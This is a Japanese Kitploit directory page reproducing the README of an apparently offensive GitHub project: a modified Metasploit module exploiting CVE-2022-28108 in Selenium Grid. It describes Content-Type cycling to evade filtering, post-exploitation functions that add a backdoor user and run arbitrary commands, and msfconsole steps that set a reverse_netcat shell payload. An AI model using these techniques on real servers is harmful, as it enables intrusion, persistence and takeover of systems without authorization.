Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-28108 — Selenium GridのCVE-2022-28108を悪用してリモートコード実行を行うMetasploitモジュール。コンテンツタイプ回避とポストエクスプロイテーション機能を備えています。 | Kitploit
ツール/GitHubGitHub/zeroethical/cve-2022-28108
エクスプロイトフレームワーク脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストレッドチーミングペイロード開発
GitHubzeroethical/cve-2022-28108

CVE-2022-28108

Selenium GridのCVE-2022-28108を悪用してリモートコード実行を行うMetasploitモジュール。コンテンツタイプ回避とポストエクスプロイテーション機能を備えています。

リポジトリを見る
31年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Selenium Chrome RCE エクスプロイト(拡張版)

このリポジトリには、Selenium Server(Grid)の旧バージョンにおけるリモートコード実行(RCE)の脆弱性を悪用するMetasploitモジュールの修正版が含まれています。

このコードを使用する前に、このREADMEをよくお読みください。


原著作者への謝辞:

このモジュールは、CVE-2022-28108向けMetasploitモジュールの原著作者による優れた業績に基づいています。Selenium Serverの脆弱性を悪用する中核的な機能は、その実装に大きく基づいています。私たちは、セキュリティコミュニティへの彼らの貢献に謝意を表します。

  • オリジナルのMetasploitモジュール: オリジナルのモジュールはMetasploit Framework内にあります。
  • 原著作者: 原著作者はモジュール自体の中(通常は 'Author' セクション)でクレジットされています。具体的な名前についてはオリジナルのモジュールを参照してください。

悪用される脆弱性:

このモジュールは、Selenium Server(Grid)の4.0.0-alpha-7より前のバージョンにおけるクロスサイトリクエストフォージェリ(CSRF)脆弱性である CVE-2022-28108 を標的とします。この脆弱性は、サーバーが特定のリクエストに対してJSON以外のコンテンツタイプ(text/plain、application/x-www-form-urlencoded、multipart/form-data など)を許可することに起因します。攻撃者はこれを利用して悪意のあるリクエストを送信し、サーバー上でリモートコード実行(RCE)を行うことができます。

オリジナルコードの仕組み:

オリジナルのMetasploitモジュールは、脆弱なSelenium Serverの /wd/hub/session エンドポイントに細工したPOSTリクエストを送信することでこの脆弱性を悪用します。このリクエストは、JSON以外の Content-Type(具体的には )を利用し、目的のブラウザ機能の 内に悪意のある設定を含めます。これにより、攻撃者は任意のバイナリ( など)と引数を指定し、新しいブラウザセッションが開始されたときにサーバー上で実行させることができます。

text/plain
goog:chromeOptions
/usr/bin/python3

このバージョンでの変更点と拡張機能:

このリポジトリには、オリジナルのMetasploitモジュールの修正版が含まれています。主な変更点は以下のとおりです。

  • Content-Typeの回避: 修正版モジュールは、複数の異なる Content-Type ヘッダーで悪意のあるリクエストを送信して脆弱性を悪用しようとします。これには text/plain、application/x-www-form-urlencoded、multipart/form-data が含まれます。これは、特定の Content-Type を探している可能性のある基本的なフィルタリングや検知メカニズムを迂回する可能性を狙ったものです。
  • execute_post_exploitation 関数: 新しい関数 execute_post_exploitation(session_response) が追加されました。この関数はエクスプロイト成功後に呼び出され、基本的なポストエクスプロイテーションタスクを実行することを目的としています。現在の実装では、以下が含まれます。
    • システムへのバックドアユーザーの追加を試みる。
    • 基本的なシステム情報(ユーザー名、ID、カーネルバージョン)の収集。
  • execute_command_on_target 関数: もう1つの新しい関数 execute_command_on_target(command) が追加されました。この関数は、エクスプロイト成功後にターゲットシステム上で任意のコマンドを実行することを可能にします。これは execute_post_exploitation 関数内で使用され、さらなるポストエクスプロイテーション活動のために拡張できます。

主な相違点:

中心的な違いは、exploit メソッドと2つの新しい関数の追加にあります。

  • オリジナルの exploit メソッド: Content-Type: text/plain を使用した単一のリクエストを送信することに重点を置いていました。
  • 修正版の exploit メソッド: 異なる Content-Type の値を繰り返し処理し、それぞれでエクスプロイトを試みます。エクスプロイトが成功すると、execute_post_exploitation 関数を呼び出します。
  • 新しい関数: execute_post_exploitation 関数と execute_command_on_target 関数は、この修正版への完全に新しい追加であり、拡張されたポストエクスプロイテーション機能を提供します。

修正版モジュールの使用方法:

  1. Metasploit Frameworkがインストールされていることを確認してください。
  2. 修正版コードを保存します: 提供されたRubyコードを .rb ファイル(例:selenium_rce_extended.rb)として保存してください。
  3. モジュールをMetasploitモジュールディレクトリに配置します: 保存したファイルを適切なMetasploitモジュールディレクトリにコピーしてください。通常、これは /usr/share/metasploit-framework/modules/exploits/ または ~/.msf4/modules/exploits/ にあります。正確な場所については、お使いのMetasploitのインストール先を参照してください。
  4. Metasploitコンソールを起動します: ターミナルを開き、msfconsole を実行してください。
  5. モジュールをロードします: Metasploitコンソールで、コマンド use exploit/selenium_rce_extended を使用します(サブディレクトリに配置した場合は、ファイルを保存したパスを使用します)。
  6. ターゲットを設定します: 脆弱なSelenium ServerのターゲットIPアドレスとポートを設定します。
    root@kitploit:~
    msf6 exploit(selenium_rce_extended) > set RHOSTS <target_ip>
    msf6 exploit(selenium_rce_extended) > set RPORT <target_port>
    
    (Selenium Gridのデフォルトポートは通常4444です)。
  7. ペイロードを設定します: ターゲットシステム上で実行するペイロードを選択します。たとえば、リバースシェルを取得するには:
    root@kitploit:~
    msf6 exploit(selenium_rce_extended) > set PAYLOAD cmd/unix/reverse_netcat
    msf6 exploit(selenium_rce_extended) > set LHOST <your_ip>
    msf6 exploit(selenium_rce_extended) > set LPORT <your_port>
    
  8. エクスプロイトを実行します: コマンド exploit でモジュールを実行します。

重要な注意事項(免責事項):

  • このコードは責任を持って倫理的に使用してください。 このモジュールは教育目的と、セキュリティ専門家が自身のシステムのセキュリティをテスト・評価するために提供されています。
  • ターゲットシステムに対してテストする明示的な許可を得ていることを確認してください。 このコードの不正使用は違法かつ非倫理的です。
  • 関連するリスクを理解してください。 脆弱性を悪用すると、意図しない結果を引き起こし、ターゲットシステムを不安定にする可能性があります。
  • 隔離された管理された環境でテストしてください。 常に、完全に制御でき、潜在的な損害を軽減できる環境でテストを実施してください。
  • ポストエクスプロイテーション関数は基本的な例です。 特定のニーズやターゲット環境に応じて、それらを修正または拡張する必要があるかもしれません。

免責条項:

この修正版コードの作成者は、このモジュールの使用によって引き起こされた誤用や損害について責任を負いません。このコードを使用することにより、あなたは自分の行動に対して全責任を負うことに同意したものとみなされます。

ライセンス:

この修正版コードは、おそらく元のMetasploit Frameworkと同じライセンス(通常はMSFライセンス)の対象です。詳細については、元のMetasploit Frameworkライセンスを参照してください。

貢献:

このモジュールへの貢献や改善を歓迎します。バグ修正、機能強化、新機能などを含むプルリクエストを遠慮なく送信してください。

謝辞:

CVE-2022-28108向けMetasploitモジュールの原著作者に改めて感謝の意を表します。彼らの業績がこの修正版モジュールの基盤を形成しています。

ツールをダウンロード